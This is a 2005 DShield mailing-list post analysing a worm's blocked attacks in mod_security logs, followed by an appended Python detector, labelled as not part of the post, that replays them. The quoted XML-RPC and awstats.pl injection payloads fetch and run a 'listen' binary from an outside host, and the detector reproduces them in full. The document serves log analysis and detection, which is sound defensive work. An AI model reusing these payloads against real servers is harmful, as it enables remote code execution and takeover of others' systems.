[Dshield] Linux Exploit Search

MaXX bs139412 at skynet.be
Thu Nov 10 01:45:04 GMT 2005


On Wednesday 09 November 2005 13:09, craig at xeriom.net wrote:
> On Tue, 8 Nov 2005 23:59:11 -0500, Ian Scott <ian at pairowoodies.com> wrote:
> > On November 8, 2005 09:11 pm, David Cary Hart wrote:
> >> What's particularly troubling here is that there are three different
> >> clients following the exact same pattern.
> > <snip>
> > Looks like an automated scan looking for vulnerable applications.
> > Possibly someone using Nexus?
> It could be an XML-RPC worm like the one reported yesterday at
> http://isc.sans.org/diary.php?storyid=829
It seems... 

This worm seems to spread quickly; I already have 10 sources of those things in 
my mod_security logs, and only the "listen" variant as far as I can see, but I 
haven't looked closely.
Some of the requested URLs are different from David Cary Hart's logs.

For those who are interested, the converted Snort rules for mod_security can 
catch and block it (I hope). Patch your install, don't apply those rules 
blindly, and double-check that they don't break your site...

--
MaXX

----More details below for those who want them-----
Here is a "pattern"; this one repeats for 5 different xmlrpc.php scripts:
(sorry for the awful line wraps, if any)
/xmlrpc.php
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php

Request: 12.214.68.78 - - [10/Nov/2005:01:01:28 +0100] 
"POST /drupal/xmlrpc.php HTTP/1.1" 406 164
Handler: (null)
----------------------------------------
POST /drupal/xmlrpc.php HTTP/1.1
Content-Length: 269
Content-Type: text/xml
Host: 81.244.58.XX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 406. Pattern match "wget\x20" at 
POST_PAYLOAD.
mod_security-action: 406

259
<?xml 
version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo 
'_begin_';echo `cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen         
`;echo '_end_';exit;/*</name></value></param></params></methodCall>

HTTP/1.1 406 Not Acceptable
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

Another attempt is an awstats.pl exploit (repeats for 3 different URLs):
/awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl

Request: 12.214.68.78 - - [10/Nov/2005:01:01:13 +0100] 
"GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  
HTTP/1.1" 406 164
Handler: perl-script
----------------------------------------
GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  
HTTP/1.1
Host: 81.244.58.XX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-message: Access denied with code 406. Pattern match "wget\x20" at 
THE_REQUEST.
mod_security-action: 406

HTTP/1.1 406 Not Acceptable
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
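As an added example (not part of MaXX's post, nor of the converted Snort/mod_security rules he mentions), the following Python replays both blocked requests quoted above through a detector equivalent to the "wget\x20" match named in the mod_security-message headers. The request strings are reconstructed from the log excerpts (hosts and addresses copied from them, nothing probed), and the helper names, the `normalize`/`scan` functions and the benign control request are my own. The point it demonstrates is the check a practitioner wants before trusting such a rule: the awstats GET only contains the two literal bytes `wget ` after percent-decoding, since the space arrives as `%20`, which is why a rule that matches the raw request line would miss it while mod_security's decoded THE_REQUEST does not.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the two blocked requests quoted in the post.
# The addresses are copied from the quoted log lines; nothing is contacted.
XMLRPC_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
    "<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;"
    "wget 24.224.174.18/listen;chmod +x listen;./listen `;echo '_end_';exit;/*"
    "</name></value></param></params></methodCall>"
)
AWSTATS_REQUEST_LINE = (
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224"
    "%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115"
    ";echo%20YYY;echo| HTTP/1.1"
)
# Constructed benign control: a legitimate XML-RPC introspection call.
BENIGN_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName>'
    "<params/></methodCall>"
)

# Literal form of the pattern named in the quoted mod_security-message headers.
WGET_PATTERN = re.compile(r"wget\x20")


def normalize(data: str) -> str:
    """Percent-decode once, standing in for the decoding mod_security applies
    before matching THE_REQUEST. The raw GET sample never contains 'wget '
    because the attacker encoded the space as %20."""
    return unquote(data)


def matches_raw(data: str) -> bool:
    """Naive match on the bytes as they arrived."""
    return WGET_PATTERN.search(data) is not None


def matches_normalized(data: str) -> bool:
    """Match after decoding, the way the quoted rule evidently behaved."""
    return WGET_PATTERN.search(normalize(data)) is not None


def awstats_configdir_command(request_line: str):
    """Return the shell pipeline smuggled through awstats.pl's configdir
    parameter, or None. The vulnerable awstats passed configdir to a shell,
    so a value wrapped in |...| runs whatever sits between the pipes."""
    m = re.search(r"[?&]configdir=([^ &]*)", request_line)
    if not m:
        return None
    value = unquote(m.group(1))
    if len(value) >= 2 and value.startswith("|") and value.endswith("|"):
        return value[1:-1]
    return None


def xmlrpc_backtick_command(body: str):
    """Return the backtick-quoted command in the XML-RPC payload, or None.
    The <name> value breaks out of the PHP string the vulnerable library
    evaluates and appends echo `...`; the backticks are what makes PHP
    execute the download-and-run sequence."""
    m = re.search(r"`([^`]*)`", body)
    return m.group(1).strip() if m else None


def scan(request_line: str, body: str = "") -> dict:
    """Report what a 'wget\\x20' rule would flag for one request, in the two
    locations the quoted mod_security messages name, plus the injected
    command recovered from either exploit shape."""
    hits = []
    if matches_normalized(request_line):
        hits.append("THE_REQUEST")
    if body and matches_normalized(body):
        hits.append("POST_PAYLOAD")
    return {
        "blocked": bool(hits),
        "where": hits,
        "command": awstats_configdir_command(request_line)
        or xmlrpc_backtick_command(body),
    }


if __name__ == "__main__":
    for name, line, body in (
        ("awstats GET", AWSTATS_REQUEST_LINE, ""),
        ("xmlrpc POST", "POST /drupal/xmlrpc.php HTTP/1.1", XMLRPC_BODY),
        ("benign POST", "POST /xmlrpc.php HTTP/1.1", BENIGN_BODY),
    ):
        print(name, scan(line, body))
```

Running it shows the awstats request flagged only at THE_REQUEST and only after decoding, the xmlrpc request flagged only at POST_PAYLOAD, and the benign introspection call untouched; `scan()` also hands back the recovered `cd /tmp;wget ...;chmod +x listen;./listen` sequence from both shapes, which is the string to search the rest of your logs for.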

